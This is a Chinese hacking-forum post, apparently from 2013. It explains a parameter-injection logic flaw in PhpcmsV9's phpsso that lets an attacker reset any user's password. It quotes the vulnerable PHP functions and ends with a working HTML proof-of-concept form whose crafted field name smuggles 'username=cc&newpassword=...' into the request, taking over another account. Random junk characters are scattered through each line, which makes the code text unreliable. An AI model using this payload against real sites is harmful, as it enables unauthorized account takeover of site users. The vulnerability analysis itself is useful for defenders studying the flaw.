找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2012|回复: 0
打印 上一主题 下一主题

PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 14:46:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
提到的通行证的代码:2 R, S  {5 C' C! v- C; m

% \! s! ~* P! M' x/ ?# s
- e0 |; }5 ~+ l) S' Uparse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);- q# ~/ k, A. H

0 z7 _) M* t/ q6 W* b在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。( H# x' o& g1 y9 x7 O+ k9 [  |

! L0 E) m, W; i5 k& S我把它留给了你们。4 ^1 G6 j  T1 w- \
不知道你们发现了它没有。% `" d8 E( b$ \+ u+ w
" [  u4 t1 z' s$ T
我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。
* s( {% F% D* s9 E0 b/ w+ w7 k& G+ G$ v1 U  E, }
所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。! P, t3 T5 |7 {. R6 H% f

7 H( a2 ~# O; \) P也就是# N" r; U0 @& k0 h3 L4 ^( l
7 [1 ?  s, P+ ?' r* u# X9 _
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。0 r! ~8 ~4 b1 ^* V

8 i* `. ~* |+ l) X要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。$ T3 e! m# j6 ^" v% ~

& B8 F  f4 r/ E/ A1 S8 Y% Q, v# W$ d7 |* L
其实我们有这样的机会,看看代码,如下:, y0 b0 ?  L7 j* D' C2 ]

& e$ x( X& D! N& u, j1 [1 ?" y' I: R. k# M' M
public function auth_data($data) {; Y8 {. A& u" f6 A% ~0 {
                $s = $sep = '';
; E4 Y9 ^* b8 v/ o, L; B' B                foreach($data as $k => $v) {6 p: k( ]2 \6 w
                        if(is_array($v)) {0 S. s" }8 E* H  I
                                $s2 = $sep2 = '';" G# S( ?# h/ d. H; t$ d
                                foreach($v as $k2 => $v2) {
' w- E1 Q- F8 x/ \8 i, A$ O                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);8 P7 Z+ _$ n$ ^& C; x& l9 Y
                                        $sep2 = '&';
7 V* ]7 j* [4 D5 o                                }
! q5 S0 }5 H1 [# V; L. h                                $s .= $sep.$s2;3 V9 J: k2 V' W2 _: s$ u7 r
                        } else {
4 q: K, c8 ]( X( n) ^1 W+ q                                $s .= "$sep$k=".$this->_ps_stripslashes($v);. {# l- `% o; |. j6 Z; t% E2 C
                        }
+ M( u% ]% N9 @0 f9 |) c. z                        $sep = '&';* E) J" F9 i4 c7 d5 x
                }
' p' u' O5 \$ X( p4 `
9 n/ x1 M' N% Q                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
6 c. I: }) X' n                return $auth_s;
) U* `: M, E, S        }6 Q* z9 B5 d4 F
$ S9 U/ w9 d1 a  X/ S) Q' `
可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
) O/ R% x+ D  X1 R4 u/ _4 V
4 U( e- K* `: D! K% ]: S8 M举个例子2 R' ?1 p; j4 r% ^0 @, a
% B# \# D7 @( p  y
$a[aaa=a&bbb] = 'a';* a* E# J* U: H$ G
8 d$ \: i- u4 A) `" x
会变成aaa=a&bbb=a/ H- M+ o4 O+ U& w8 y' t/ }# J. K
5 G( p) |$ F: k$ v
明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。
2 n, i4 A9 d6 @" J3 q1 z7 f( g. T. ?7 i
这个时候,我们可以再去看一个函数。
! C* {" p4 B9 e3 O% w3 s
# z6 s' N' y! h0 w$ c就在这个文件内:+ d: `7 Y' I; P8 H; u3 W. V

, o: b7 I6 R0 F+ s' g; n( w/ L5 X) S' U- @& r# q8 q5 D. {
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
- Z3 x" u. ~! K                if($email && !$this->_is_email($email)) {
* T* d6 _  T! Q: s  ]                        return -4;+ r  d$ h/ k, @  T
                }
7 }  ^, o. o, P% H                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));" P8 q/ J8 P2 h2 M3 B
        }
3 v+ O- M3 j9 m! H+ |5 Q/ ~' A2 n9 U3 z) ~( c( V
这是向通行证发了这样一个请求。
) [: S; k' G0 ?' c1 ]- G( n2 O0 M1 Y1 I4 l( J2 T2 I: R
我们再跟到通信证代码里去看看,就会有所发现。4 _! u6 Q/ |* y/ g
! P, f$ s, z# }2 b$ E

& v% p5 h0 a4 H  Q9 W1 |5 n/ p/ upublic function edit() {
1 t8 F: F& @( V' h//能省就省,太长了不是吗?
# k. Z$ b. M7 d: Y
8 E! s. k% z# n0 l3 B* W$ {if($this->username) {
3 [3 B0 \5 @1 V& Q  n2 l/ M//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。) Y# j0 C2 F/ I) @* G4 W
                                $res = $this->db->update($data, array('username'=>$this->username));7 f& G6 `" s% y5 |( d' M( R
                        } else {
  W3 J7 k" B0 E$ e" l" u                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);: |' b7 a$ V% b' [, [$ A9 n6 p
                                $res = $this->db->update($data, array('uid'=>$this->uid));
$ i9 Q: [: |  J. `. R7 |                        }
1 x3 B* i+ n5 |  \6 D( F- F% M  S, l
好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:
, s1 p7 H4 U' y# ?: b- z. F7 q& ?2 W. x0 t& D* E1 d/ E
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')/ K/ p! ^0 ^, W1 l1 K
, i, @) q0 n3 i* Y6 P& I
很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
  v9 ~9 Y7 v" p
& l7 V0 w, @/ w! S我当然找到了:
4 q$ d" o) p2 wphpcms9/phpcms/modules/member/index.php0 w9 M9 `# |/ B6 v
3 ]) N( Q& N5 g/ s# o
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
+ c' U( a7 m+ I9 ]
& G1 Q9 I0 M1 w- a" |, |然后就没有然后了。5 {9 j3 I- p; K: A& Z2 j7 k

4 T+ q2 C0 L! o! f<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
6 b' H# P4 D% \7 c0 l) r3 K                                <table width="100%" cellspacing="0" class="table_form">% u2 ]% H5 f1 [- u
                                        <tr>& `$ l& u5 Y  T8 m0 v
                                                <th width="80">邮箱:</th>        : j# q9 G0 e. O) i8 p  ?
                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
! D( h7 u! a: X                                        </tr>$ y- Q  u9 ?# u9 k) d
                                        <tr>6 I6 T' U/ ?5 o! G/ R% t$ \" x
                                                <th width="80">原密码:</th>        & V5 S: K" ]) D6 _% Q
                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
2 u9 V# p2 m- K7 b" F4 W) W                                        </tr>, E7 C, y, c; ]2 z& ~
                                        <tr>
& }# C8 x2 u2 o' Z6 v* ]1 M                                                <th>新密码:</th>* b5 ~- R+ S" R. j
                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
- J6 e# j$ \1 P2 }" [* L: l                                        </tr>7 ]* U3 M- {- X3 `  w2 \
                                        <th></th>0 q  f# P* y- P+ o# h9 z
                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
) g1 {1 u8 F3 g7 j0 U, W& d. i& ?                                        </tr>
0 o* ~  F# M& w7 J- l) G2 U                                </table>
/ x8 h) N; g8 q! }8 V! C/ I- T. c8 ?' x& ~' J& z2 a  [3 x* v$ m" r" e
                                * c! o  j2 E$ W7 ?! B6 m
                        </form>
7 P" t# ]2 \5 }* C1 x" [4 m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表